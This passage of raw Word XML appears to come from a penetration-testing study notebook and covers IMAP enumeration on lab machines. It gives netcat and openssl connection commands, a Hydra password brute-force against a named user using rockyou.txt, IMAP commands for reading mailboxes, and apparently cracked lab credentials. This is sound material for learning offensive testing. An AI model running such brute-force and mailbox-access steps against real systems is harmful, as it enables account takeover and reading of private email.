    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002810">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11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ixjbcgormmkc" w:id="349"/>
      <w:bookmarkEnd w:id="349"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002812">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002813">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For IMAP over plaintext (port 143):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002814">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 143</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002815">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002816">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For IMAPS (IMAP over SSL on port 993):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002817">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect target:993</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002818">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this instead of netcat to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002819">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try STARTTLS authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 113</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STARTTLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in this command initially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect 192.168.229.137:143 -starttls imap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="732"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000281F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002820">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For anonymous login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002821">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="607"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 LOGIN anonymous ""</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002822">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002823">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE ABOUT TAGS (a1, a2, …):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002824">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1, a2, etc. are just tags you invent to match commands with responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002825">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They don’t have to be sequential or numeric — order doesn’t matter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002826">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only rule: tags must be unique in that session to avoid ambiguity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002827">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002828">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1, b2111, michael, f32</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and so on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002829">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You just can't have two duplicate tags </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">People just use a1, a2 and so on for easy organization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce IMAP using Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l jonas -P rockyou.txt -e nsr imap://192.168.244.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000282F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002830">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic commands to run everywhere:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002831">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 login jonas SicMundusCreatusEst</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002832">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 select INBOX → choose a mailbox/folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002833">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a3 list "" * → list all mailboxes/folders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002834">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002835">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands to run while inside a mailbox/folder or subfolder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002836">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a4 fetch 1 body[] → fetch message 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002837">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a5 fetch 2 body[header] → fetch headers only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a6 search all → list all message ID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002839">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a7 close → leave your folder or subfolder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283A">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7719572" cy="4008239"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="535" name="image534.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image534.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId837"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7719572" cy="4008239"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283B">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="8269580" cy="2709863"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="389" name="image378.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image378.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId838"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8269580" cy="2709863"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message in INBOX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
